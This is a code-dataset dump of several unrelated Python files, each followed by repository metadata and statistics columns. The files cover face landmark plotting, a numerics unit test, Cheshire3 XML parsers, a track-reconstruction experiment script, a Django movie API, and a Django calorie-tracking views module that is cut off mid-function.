qns_all = qns_all.reshape(10, qns_all.shape[0] // 10, -1)
qn_means = qns_all.mean(dim=0)
converged = (qn_means < qn_threshold).cpu().numpy()
plot_labels.append(label)
if not converged.any(axis=-1).all(): # Some of them are not converged ever
plot_x.append([])
else:
plot_x.append(converged.argmax(axis=-1) * dx)
xvals = [i for i in range(len(plot_x)) if plot_x[i] != []]
x = np.stack([x for x in plot_x if x != []])
mins = x.min(axis=1)
maxes = x.max(axis=1)
means = x.mean(axis=1)
std = x.std(axis=1)
# create stacked errorbars:
ax.errorbar(xvals, means, std, fmt='ok', lw=3)
ax.errorbar(xvals, means, [means - mins, maxes - means],
fmt='.k', ecolor='gray', lw=1)
ax.set_xticks(np.arange(len(plot_x)))
ax.set_xticklabels(plot_labels)
| 35.558511
| 128
| 0.618624
| 1,870
| 13,370
| 4.235829
| 0.227273
| 0.059336
| 0.01515
| 0.008332
| 0.292135
| 0.212094
| 0.203005
| 0.203005
| 0.180028
| 0.156925
| 0
| 0.02245
| 0.240389
| 13,370
| 376
| 129
| 35.558511
| 0.757483
| 0.287509
| 0
| 0.20297
| 0
| 0.004951
| 0.110347
| 0.015667
| 0
| 0
| 0
| 0
| 0.014851
| 1
| 0.113861
| false
| 0
| 0.024752
| 0.019802
| 0.20297
| 0.029703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b28352f856a9eaa1fa2b24d293fcd81d28eb11c
| 4,750
|
py
|
Python
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 39
|
2018-07-28T04:37:48.000Z
|
2022-01-20T18:34:37.000Z
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 2
|
2018-08-27T08:19:22.000Z
|
2019-08-16T09:15:34.000Z
|
dfa/visualize.py
|
garyzhao/FRGAN
|
8aeb064fc93b45d3d8e074c5253b4f7a287582f4
|
[
"Apache-2.0"
] | 8
|
2018-07-31T09:33:49.000Z
|
2020-12-06T10:16:53.000Z
|
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
import matplotlib.pyplot as plt
from .face import compute_bbox_size
end_list = np.array([17, 22, 27, 42, 48, 31, 36, 68], dtype=np.int32) - 1
def plot_kpt(image, kpt):
''' Draw 68 key points
Args:
image: the input image
kpt: (68, 3).
'''
image = image.copy()
kpt = np.round(kpt).astype(np.int32)
for i in range(kpt.shape[0]):
st = kpt[i, :2]
image = cv2.circle(image, (st[0], st[1]), 1, (0, 0, 255), 2)
if i in end_list:
continue
ed = kpt[i + 1, :2]
image = cv2.line(image, (st[0], st[1]), (ed[0], ed[1]), (255, 255, 255), 1)
return image
def build_camera_box(rear_size=90):
point_3d = []
rear_depth = 0
point_3d.append((-rear_size, -rear_size, rear_depth))
point_3d.append((-rear_size, rear_size, rear_depth))
point_3d.append((rear_size, rear_size, rear_depth))
point_3d.append((rear_size, -rear_size, rear_depth))
point_3d.append((-rear_size, -rear_size, rear_depth))
front_size = int(4 / 3 * rear_size)
front_depth = int(4 / 3 * rear_size)
point_3d.append((-front_size, -front_size, front_depth))
point_3d.append((-front_size, front_size, front_depth))
point_3d.append((front_size, front_size, front_depth))
point_3d.append((front_size, -front_size, front_depth))
point_3d.append((-front_size, -front_size, front_depth))
point_3d = np.array(point_3d, dtype=np.float).reshape(-1, 3)
return point_3d
def plot_pose_box(image, Ps, pts68s, color=(40, 255, 0), line_width=2):
''' Draw a 3D box as annotation of pose. Ref:https://github.com/yinguobing/head-pose-estimation/blob/master/pose_estimator.py
Args:
image: the input image
P: (3, 4). Affine Camera Matrix.
kpt: (2, 68) or (3, 68)
'''
image = image.copy()
if not isinstance(pts68s, list):
pts68s = [pts68s]
if not isinstance(Ps, list):
Ps = [Ps]
for i in range(len(pts68s)):
pts68 = pts68s[i]
llength = compute_bbox_size(pts68)
point_3d = build_camera_box(llength)
P = Ps[i]
# Map to 2d image points
point_3d_homo = np.hstack((point_3d, np.ones([point_3d.shape[0], 1]))) # n x 4
point_2d = point_3d_homo.dot(P.T)[:, :2]
point_2d[:, 1] = - point_2d[:, 1]
point_2d[:, :2] = point_2d[:, :2] - np.mean(point_2d[:4, :2], 0) + np.mean(pts68[:2, :27], 1)
point_2d = np.int32(point_2d.reshape(-1, 2))
# Draw all the lines
cv2.polylines(image, [point_2d], True, color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[1]), tuple(
point_2d[6]), color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[2]), tuple(
point_2d[7]), color, line_width, cv2.LINE_AA)
cv2.line(image, tuple(point_2d[3]), tuple(
point_2d[8]), color, line_width, cv2.LINE_AA)
return image
def draw_landmarks(img, pts, style='fancy', wfp=None, show_flg=False, **kwargs):
"""Draw landmarks using matplotlib"""
# height, width = img.shape[:2]
# plt.figure(figsize=(12, height / width * 12))
plt.imshow(img[:, :, ::-1])
plt.subplots_adjust(left=0, right=1, top=1, bottom=0)
plt.axis('off')
if not type(pts) in [tuple, list]:
pts = [pts]
for i in range(len(pts)):
if style == 'simple':
plt.plot(pts[i][0, :], pts[i][1, :], 'o', markersize=4, color='g')
elif style == 'fancy':
alpha = 0.8
markersize = 4
lw = 1.5
color = kwargs.get('color', 'w')
markeredgecolor = kwargs.get('markeredgecolor', 'black')
nums = [0, 17, 22, 27, 31, 36, 42, 48, 60, 68]
# close eyes and mouths
plot_close = lambda i1, i2: plt.plot([pts[i][0, i1], pts[i][0, i2]], [pts[i][1, i1], pts[i][1, i2]],
color=color, lw=lw, alpha=alpha - 0.1)
plot_close(41, 36)
plot_close(47, 42)
plot_close(59, 48)
plot_close(67, 60)
for ind in range(len(nums) - 1):
l, r = nums[ind], nums[ind + 1]
plt.plot(pts[i][0, l:r], pts[i][1, l:r], color=color, lw=lw, alpha=alpha - 0.1)
plt.plot(pts[i][0, l:r], pts[i][1, l:r], marker='o', linestyle='None', markersize=markersize,
color=color,
markeredgecolor=markeredgecolor, alpha=alpha)
if wfp is not None:
plt.savefig(wfp, dpi=200)
print('Save visualization result to {}'.format(wfp))
if show_flg:
plt.show()
| 35.714286
| 129
| 0.573895
| 720
| 4,750
| 3.629167
| 0.259722
| 0.050899
| 0.049751
| 0.055109
| 0.316877
| 0.252966
| 0.244164
| 0.244164
| 0.224646
| 0.224646
| 0
| 0.07013
| 0.270526
| 4,750
| 132
| 130
| 35.984848
| 0.683983
| 0.098526
| 0
| 0.086957
| 0
| 0
| 0.019664
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.065217
| 0
| 0.141304
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b2c3dcb95bb9538fdb4cb9f25daeb1cf42bc3eb
| 875
|
py
|
Python
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 101
|
2019-03-30T05:23:01.000Z
|
2021-11-27T09:09:40.000Z
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 3
|
2019-04-17T06:04:12.000Z
|
2020-12-14T17:36:01.000Z
|
cocos/tests/test_numerics/test_statistics/test_mean.py
|
michaelnowotny/cocos
|
3c34940d7d9eb8592a97788a5df84b8d472f2928
|
[
"MIT"
] | 5
|
2020-02-07T14:29:50.000Z
|
2020-12-09T17:54:07.000Z
|
import cocos.device
import cocos.numerics as cn
import numpy as np
import pytest
test_data = [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 20]],
dtype=np.int32),
np.array([[0.2, 1.0, 0.5], [0.4, 0.5, 0.6], [0.7, 0.2, 0.25]],
dtype=np.float32),
np.array([[0.5, 2.3, 3.1], [4, 5.5, 6], [7 - 9j, 8 + 1j, 2 + 10j]],
dtype=np.complex64)]
@pytest.mark.parametrize("A", test_data)
def test_mean(A):
cocos.device.init()
A_arch = cn.array(A)
# # using numpy
# mean_numpy = np.mean(A)
#
# # using Archimedes
# mean_arch = cn.mean(A_arch)
# conduct tests
# tests mean
assert np.allclose(np.mean(A), cn.mean(A_arch))
assert np.allclose(np.mean(A, axis=0), cn.mean(A_arch, axis=0))
assert np.allclose(np.mean(A, axis=1), cn.mean(A_arch, axis=1))
| 26.515152
| 80
| 0.537143
| 149
| 875
| 3.087248
| 0.295302
| 0.097826
| 0.06087
| 0.095652
| 0.232609
| 0.167391
| 0.117391
| 0
| 0
| 0
| 0
| 0.088468
| 0.276571
| 875
| 32
| 81
| 27.34375
| 0.638231
| 0.121143
| 0
| 0
| 0
| 0
| 0.001319
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b332b95f4298d84e9d671c6d88abc96e79fcae6
| 7,145
|
py
|
Python
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 3
|
2015-08-02T09:03:28.000Z
|
2017-12-06T09:26:14.000Z
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 5
|
2015-08-17T01:16:35.000Z
|
2015-09-16T21:51:27.000Z
|
cheshire3/parser.py
|
cheshire3/cheshire3
|
306348831ec110229c78a7c5f0f2026a0f394d2c
|
[
"Python-2.0",
"Unlicense"
] | 6
|
2015-05-17T15:32:20.000Z
|
2020-04-22T08:43:16.000Z
|
import cStringIO
import StringIO
from xml.sax import make_parser, ErrorHandler, SAXParseException
from xml.sax import InputSource as SaxInput
from xml.dom.minidom import parseString as domParseString
from xml.parsers.expat import ExpatError
from lxml import etree
from cheshire3.baseObjects import Parser
from cheshire3.record import (
SaxRecord,
SaxContentHandler,
DomRecord,
MinidomRecord,
MarcRecord
)
from cheshire3.record import LxmlRecord
from cheshire3.utils import nonTextToken
from exceptions import XMLSyntaxError
class BaseParser(Parser):
def _copyData(self, doc, rec):
# Utility function to update data on record from document
rec.id = doc.id
rec.filename = doc.filename
rec.tagName = doc.tagName
rec.processHistory = doc.processHistory
rec.processHistory.append(self.id)
if doc.documentStore:
rec.parent = ('document', doc.documentStore, doc.id)
elif doc.parent:
rec.parent = doc.parent
class MinidomParser(BaseParser):
"""Use default Python Minidom implementation to parse document."""
def process_document(self, session, doc):
xml = doc.get_raw(session)
try:
dom = domParseString(xml)
except ExpatError as e:
raise XMLSyntaxError(e.message)
rec = MinidomRecord(dom, xml)
self._copyData(doc, rec)
return rec
class SaxParser(BaseParser):
"""Default SAX based parser. Creates SaxRecord."""
_possibleSettings = {
'namespaces': {
'docs': "Enable namespace processing in SAX"
},
'stripWhitespace': {
'docs': "Strip additional whitespace when processing."
},
'attrHash': {
'docs': "Tag/Attribute combinations to include in hash."
}
}
def __init__(self, session, config, parent):
Parser.__init__(self, session, config, parent)
self.parser = make_parser()
self.errorHandler = ErrorHandler()
self.parser.setErrorHandler(self.errorHandler)
self.inputSource = SaxInput()
ch = SaxContentHandler()
self.contentHandler = ch
self.parser.setContentHandler(ch)
self.keepError = 1
if (self.get_setting(session, 'namespaces')):
self.parser.setFeature('http://xml.org/sax/features/namespaces',
1)
p = self.get_setting(session, 'attrHash')
if (p):
l = p.split()
for i in l:
(a, b) = i.split("@")
try:
ch.hashAttributesNames[a].append(b)
except:
ch.hashAttributesNames[a] = [b]
if self.get_setting(session, 'stripWhitespace'):
ch.stripWS = 1
def process_document(self, session, doc):
xml = doc.get_raw(session)
if type(xml) == unicode:
# SAX parser cannot deal with unicode
xml = xml.encode('utf-8')
self.inputSource.setByteStream(cStringIO.StringIO(xml))
ch = self.contentHandler
ch.reinit()
try:
self.parser.parse(self.inputSource)
except SAXParseException as e:
# Splat. Reset self and reraise
if self.keepError:
# Work out path
path = []
for l in ch.pathLines:
line = ch.currentText[l]
elemName = line[2:line.index('{') - 1]
path.append("%s[@SAXID='%s']" % (elemName, l))
self.errorPath = '/'.join(path)
else:
ch.reinit()
raise XMLSyntaxError(str(e))
rec = SaxRecord(ch.currentText, xml, wordCount=ch.recordWordCount)
rec.elementHash = ch.elementHash
rec.byteCount = len(xml)
self._copyData(doc, rec)
ch.reinit()
return rec
class StoredSaxParser(BaseParser):
def process_document(self, session, doc):
data = doc.get_raw(session)
data = unicode(data, 'utf-8')
sax = data.split(nonTextToken)
if sax[-1][0] == "9":
line = sax.pop()
elemHash = pickle.loads(str(line[2:]))
else:
elemHash = {}
rec = SaxRecord(sax)
rec.elementHash = elemHash
return rec
class LxmlParser(BaseParser):
""" lxml based Parser. Creates LxmlRecords """
_possibleSettings = {
'validateDTD': {
'docs': ("Validate to DTD while parsing (if a DTD was "
"referenced by the Document.)"),
'type': int,
'options': "0|1"
},
'allowNetwork': {
'docs': ("Allow network access to look up external documents "
"(DTDs etc.)"),
'type': int,
'options': "0|1"
}
}
def __init__(self, session, config, parent):
BaseParser.__init__(self, session, config, parent)
dtdVal = bool(self.get_setting(session, 'validateDTD', 0))
noNetwork = not self.get_setting(session, 'allowNetwork', 0)
self.parser = etree.XMLParser(dtd_validation=dtdVal,
no_network=noNetwork)
def process_document(self, session, doc):
# Input must be string or stream
data = doc.get_raw(session)
try:
try:
et = etree.parse(StringIO.StringIO(data), self.parser)
except AssertionError:
data = data.decode('utf8')
et = etree.parse(StringIO.StringIO(data), self.parser)
except etree.XMLSyntaxError as e:
raise XMLSyntaxError(e.message)
rec = LxmlRecord(et)
rec.byteCount = len(data)
self._copyData(doc, rec)
return rec
class LxmlSchemaParser(Parser):
pass
class LxmlRelaxNGParser(Parser):
pass
class LxmlHtmlParser(BaseParser):
"""lxml based parser for HTML documents."""
def __init__(self, session, config, parent):
BaseParser.__init__(self, session, config, parent)
self.parser = etree.HTMLParser()
def process_document(self, session, doc):
data = doc.get_raw(session)
et = etree.parse(StringIO.StringIO(data), self.parser)
rec = LxmlRecord(et)
rec.byteCount = len(data)
self._copyData(doc, rec)
return rec
class PassThroughParser(BaseParser):
"""Take a Document that already contains parsed data and return a Record.
Copy the data from a document (eg list of sax events or a dom tree) into
an appropriate record object.
"""
def process_document(self, session, doc):
# Simply copy data into a record of appropriate type
data = doc.get_raw(session)
if isinstance(data, list):
rec = SaxRecord(data)
else:
rec = DomRecord(data)
self._copyData(doc, rec)
return rec
class MarcParser(BaseParser):
"""Creates MarcRecords which fake the Record API for Marc."""
def process_document(self, session, doc):
return MarcRecord(doc)
| 31.065217
| 77
| 0.588383
| 759
| 7,145
| 5.467721
| 0.300395
| 0.034458
| 0.030361
| 0.037108
| 0.256867
| 0.220241
| 0.18988
| 0.155663
| 0.136867
| 0.113735
| 0
| 0.004477
| 0.312246
| 7,145
| 229
| 78
| 31.200873
| 0.840049
| 0.088873
| 0
| 0.323864
| 0
| 0
| 0.076947
| 0
| 0
| 0
| 0
| 0
| 0.005682
| 1
| 0.0625
| false
| 0.017045
| 0.068182
| 0.005682
| 0.238636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e26ff289e7c1f363b136e3f4b93da4585664e71
| 6,275
|
py
|
Python
|
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
scripts/checkpT_curv.py
|
masamuch/hepqpr-qallse
|
0b39f8531c6f3c758b94c31f4633f75dcfeb67ad
|
[
"Apache-2.0"
] | null | null | null |
from hepqpr.qallse import *
from hepqpr.qallse.plotting import *
from hepqpr.qallse.cli.func import time_this
import time
import pickle
# import the method
from hepqpr.qallse.dsmaker import create_dataset
modelName = "D0"
#modelName = "Mp"
#modelName = "Doublet"
maxTry=1
# 5e-3 : 167 MeV
# 8e-4 : 1.04 GeV
varDensity = []
for ptThr_w in [0.15, 0.20, 0.30, 0.4, 0.50, 0.6, 0.75, 0.9, 1.0, 1.2]:
for ptThr_r in [3e-4, 3.5e-4, 4e-4, 4.5e-4, 5e-4, 6e-4, 7e-4, 8e-4, 9e-4, 1e-3, 1.2e-3, 1.5e-3, 1.7e-3, 2e-3, 2.5e-3, 3e-3, 4e-3, 5e-3]:
varDensity.append((modelName, ptThr_w, ptThr_r, maxTry))
#varDensity = [
# (modelName, 0.20, 5e-3, maxTry),
# (modelName, 1.00, 5e-3, maxTry),
#
#]
picklename = ".tmp.checkpT_curv.pickle"
try:
with open(picklename,'rb') as f:
results = pickle.load(f)
except:
print ("No pickle files.")
results = {}
for v in varDensity:
nTry = v[3]
for iTry in range(nTry):
k = (v[0], v[1], v[2], iTry)
print (k)
ModelName = k[0]
ptThr_w = k[1]
ptThr_r = k[2]
Density = 0.05
if k in results:
continue
results[k] = {}
results[k]["density"] = Density
results[k]["ptThr_w"] = ptThr_w
results[k]["ptThr_r"] = ptThr_r
results[k]["ModelName"] = ModelName
# dataset creation options
ds_options = dict(
# output directory: output_path+prefix
output_path='/tmp',
#prefix='ds_'+k,
#prefix=prefix,
# size
density = Density,
#phi_bounds = (0.15, 1.05),
# important: no pt cut
high_pt_cut = ptThr_w,
)
prefix = f'ez-{Density}'
if ds_options["high_pt_cut"] > 0:
prefix += f'_hpt-{ds_options["high_pt_cut"]}'
else:
prefix += '_baby'
prefix += f'_{iTry}'
prefix += f'_noPhiCut'
ds_options["prefix"] = prefix
# generate the dataset
import os
path = os.path.join(ds_options['output_path'], prefix, "event000001000")
if os.path.exists(path + "-hits.csv"):
import json
with open(path + "-meta.json") as f:
meta = json.load(f)
with open(path+"-metaHits.pickle", 'rb') as f:
time_info= pickle.load(f)
else:
with time_this() as time_info:
meta, path = create_dataset(**ds_options)
with open(os.path.join(path+"-metaHits.pickle"), 'wb') as f:
pickle.dump(time_info, f)
results[k]['TReadingHits'] = time_info[1]
results[k]['meta']=meta
from hepqpr.qallse.seeding import generate_doublets, SeedingConfig
# generate the doublets: the important part is the config_cls !
if os.path.exists(path + "-doublets.csv"):
doublets = pd.read_csv(path + "-doublets.csv", index_col=0)
results[k]['TInitialDoubletBuilding'] = time_info[1]
with open(path+"-metaDoublets.pickle", 'rb') as f:
time_info= pickle.load(f)
else:
with time_this() as time_info:
doublets = generate_doublets(hits_path=path+'-hits.csv', config_cls=SeedingConfig)
doublets.to_csv(path+'-doublets.csv')
with open(os.path.join(path+"-metaDoublets.pickle"), 'wb') as f:
pickle.dump(time_info, f)
results[k]['TInitialDoubletBuilding'] = time_info[1]
print('number of doublets = ', len(doublets))
results[k]['Ndoublets'] = len(doublets)
from hepqpr.qallse.qallse import Config
config = Config()
config.tplet_max_curv = ptThr_r
dw = DataWrapper.from_path(path + '-hits.csv')
if modelName == "D0":
from hepqpr.qallse.qallse_d0 import D0Config
new_config = merge_dicts(D0Config().as_dict(), config.as_dict())
model = QallseD0(dw, **new_config)
elif modelName == "Mp":
from hepqpr.qallse.qallse_mp import MpConfig
new_config = merge_dicts(MpConfig().as_dict(), config.as_dict())
model = QallseMp(dw, **new_config)
elif modelName == "Nominal":
from hepqpr.qallse.qallse import Config1GeV
new_config = merge_dicts(Config1GeV().as_dict(), config.as_dict())
model = Qallse1GeV(dw, **new_config)
elif modelName == "Doublet":
from hepqpr.qallse.qallse_doublet import DoubletConfig
new_config = merge_dicts(DoubletConfig().as_dict(), config.as_dict())
model = QallseDoublet(dw, **new_config)
p, r, ms = model.dataw.compute_score(doublets)
results[k]['precision_initDoublet'] = p
results[k]['recall_initDoublet'] = r
results[k]['missing_initDoublet'] = len(ms)
# generate the qubo as usual
with time_this() as time_info:
model.build_model(doublets)
print(f'Time of model building = {time_info[1]:.2f}s.')
results[k]['TModelBuilding'] = time_info[1]
with time_this() as time_info:
Q = model.to_qubo()
print(f'Time of qubo building = {time_info[1]:.2f}s.')
results[k]['TQuboBuilding'] = time_info[1]
results[k]['QuboSize'] = len(Q)
from hepqpr.qallse.cli.func import *
with time_this() as time_info:
response = solve_neal(Q)
print(f'Time of neal = {time_info[1]:.2f}s.')
results[k]['TNeal'] = time_info[1]
final_doublets, final_tracks = process_response(response)
en0 = 0 if Q is None else dw.compute_energy(Q)
en = response.record.energy[0]
results[k]['obsEnergy'] = en
results[k]['idealEnergy'] = en0
occs = response.record.num_occurrences
results[k]['bestOcc'] = occs[0]
results[k]['OccSum'] = occs.sum()
p, r, ms = dw.compute_score(final_doublets)
results[k]['precision'] = p
results[k]['recall'] = r
results[k]['missing'] = len(ms)
trackml_score = dw.compute_trackml_score(final_tracks)
results[k]['trackmlScore'] = trackml_score
with open(picklename, 'wb') as f:
pickle.dump(results, f)
#print(results)
| 35.055866
| 140
| 0.577211
| 824
| 6,275
| 4.258495
| 0.229369
| 0.056996
| 0.050157
| 0.019949
| 0.240809
| 0.169849
| 0.075235
| 0.069535
| 0.053577
| 0.053577
| 0
| 0.031452
| 0.285578
| 6,275
| 178
| 141
| 35.252809
| 0.751283
| 0.07012
| 0
| 0.106061
| 0
| 0
| 0.127645
| 0.021159
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.113636
| 0
| 0.113636
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e287d153cff7385984c9cc16aca63539ed882d4
| 3,382
|
py
|
Python
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 2
|
2019-06-15T01:40:04.000Z
|
2019-12-19T05:11:17.000Z
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 1
|
2021-03-09T05:22:51.000Z
|
2021-03-09T05:22:51.000Z
|
api/views/movies.py
|
iamvukasin/filminds
|
54c9d7175f3a06f411cc750a694758bd683af1ee
|
[
"MIT"
] | 2
|
2019-06-24T19:24:25.000Z
|
2020-05-29T13:57:35.000Z
|
from abc import ABC, abstractmethod
import tmdbsimple as tmdb
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.utils.decorators import method_decorator
from rest_framework.response import Response
from rest_framework.views import APIView
from api.serializers import MovieSerializer
from app.models import Movie, SearchedMovie, User, CollectedMovie
MAX_NUM_CASTS = 4
class AddCollectedMovie(ABC, APIView):
"""
Adds the given movie to the user's favorites or watch list based
on list_type property.
"""
@method_decorator(login_required)
def get(self, request, pk):
user = User.get_user(request.user)
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
try:
collected_item = CollectedMovie.objects.filter(user=user, movie=movie).get()
collected_item.type = self.list_type
except CollectedMovie.DoesNotExist:
collected_item = CollectedMovie(
user=user,
movie=movie,
type=self.list_type
)
collected_item.save()
# success status
return Response('')
@property
@abstractmethod
def list_type(self):
pass
class MovieAddToFavorites(AddCollectedMovie):
"""
Adds the given movie to the user's favorites list.
"""
list_type = CollectedMovie.TYPE_WISH
class MovieAddToWatched(AddCollectedMovie):
"""
Adds the given movie to the user's watch list.
"""
list_type = CollectedMovie.TYPE_WATCH
class RemoveCollectedMovie(APIView):
"""
Removes the given movie to the user's favorites or watch list.
"""
@method_decorator(login_required)
def get(self, request, pk):
user = User.get_user(request.user)
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
CollectedMovie.objects.filter(user=user, movie=movie).delete()
# success status
return Response('')
class MovieInfo(APIView):
"""
Returns movie information from the database (data defined in Movie
model + cast information), if the movie has been already added. If
not, gets the information from TMDB, saves to the database and
then returns it.
"""
def get(self, request, pk):
movie = Movie.get_or_create(pk)
if movie is None:
raise Http404
# insert movie into searched movies table
if request.user.is_authenticated:
SearchedMovie.increment_search_count(User.get_user(request.user), movie)
serializer = MovieSerializer(movie)
data = serializer.data
# get actors from TMDB
movie_credits = tmdb.Movies(pk).credits()
data['cast'] = []
for cast in movie_credits['cast'][:MAX_NUM_CASTS]:
cast_data = {k: v for k, v in cast.items() if k in {'character', 'name', 'profile_path'}}
# set default profile photo if no photo is received
# from TMDB
if cast_data['profile_path'] is None:
cast_data['profile_path'] = ''
else:
cast_data['profile_path'] = f'https://image.tmdb.org/t/p/w276_and_h350_face{cast_data["profile_path"]}'
data['cast'].append(cast_data)
return Response(data)
| 27.274194
| 119
| 0.646363
| 411
| 3,382
| 5.192214
| 0.326034
| 0.022493
| 0.032802
| 0.028116
| 0.31537
| 0.278351
| 0.265698
| 0.223524
| 0.223524
| 0.176195
| 0
| 0.007692
| 0.269663
| 3,382
| 123
| 120
| 27.495935
| 0.856275
| 0.181549
| 0
| 0.28125
| 0
| 0
| 0.054287
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.015625
| 0.140625
| 0
| 0.359375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e29911c2cf893692ea46e7dbded4b692a9e33a0
| 3,853
|
py
|
Python
|
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | null | null | null |
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | null | null | null |
apps/lk/views.py
|
DaniilGorokhov/CaloryHelper
|
6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51
|
[
"MIT"
] | 1
|
2021-02-15T17:40:23.000Z
|
2021-02-15T17:40:23.000Z
|
from django.shortcuts import render
from django.http import Http404, HttpResponseRedirect
from django.urls import reverse
from apps.index.models import User, UserHistory
from sova_avia.settings import MEDIA_ROOT
from imageai.Prediction import ImagePrediction
import json
from .models import Article
from .forms import ArticleForm
def index(request, user_login):
try:
user = User.objects.get(login=user_login)
except:
raise Http404
return render(request, 'lk/index.html', {'user_instance': user, 'user_login': user_login})
def view_history(request, user_login):
# try:
# history = UserHistory.objects.get(userId = user_login)
# except:
# raise Http404
user_id = User.objects.get(login=user_login).id
return render(request, 'lk/history.html', {'history': UserHistory.objects.all().filter(userId = user_id),
'user_login': user_login})
def settings(request, user_login):
try:
user = User.objects.get(login=user_login)
except:
raise Http404
return render(request, 'lk/settings.html', {'user_instance': user, 'user_login': user_login})
def wait(request, user_login):
if request.POST['password0u'] == request.POST['password1u']:
User.objects.get(login=user_login).password = request.POST['password0u']
return HttpResponseRedirect(reverse('lk:index', args=(user_login,)))
else:
return render(request, 'lk/settings.html', {'user_instance': User.objects.get(login=user_login),
'user_login': user_login})
def newPhoto(request, user_login):
if request.method == 'POST':
form = ArticleForm(request.POST, request.FILES)
if form.is_valid():
form.save()
file_name = request.FILES['file_obj']
result = process_image(file_name)
return render(request, 'lk/newPhoto.html', {'form': form, 'user_login': user_login, 'foodVariants': result})
# return render(request, 'lk/newPhoto.html', {'form': request.POST, 'user_login': user_login})
else:
form = ArticleForm()
return render(request, 'lk/newPhoto.html', {'form': form, 'user_login': user_login})
# return render(request, 'lk/newPhoto.html', {'user_login': user_login})
# return render(request, 'lk/newPhoto.html', {'user_login':user_login, 'foodVariants':
# [{'foodName': 'котлетка', 'foodDescription': "мамина"}]})
def process_image(file_name):
execution_path = "../../media/media/"
with open(MEDIA_ROOT + '/media/' + 'foods.json') as f:
foods = json.load(f)
prediction = ImagePrediction()
prediction.setModelTypeAsResNet()
prediction.setModelPath(MEDIA_ROOT + "/media/resnet50_weights_tf_dim_ordering_tf_kernels.h5")
prediction.loadModel()
result = []
predictions, probabilities = prediction.predictImage(MEDIA_ROOT + '/media/' + str(file_name), result_count=10)
for eachPrediction, eachProbability in zip(predictions, probabilities):
tmp = dict()
eachPrediction = eachPrediction.replace('_', ' ')
tmp['foodName'] = eachPrediction
tmp['foodDescription'] = eachProbability
calorieAmount = "124 cal"
flag = False
for food in foods:
if food['foodName'] == eachPrediction:
calorieAmount = food['foodDescription']
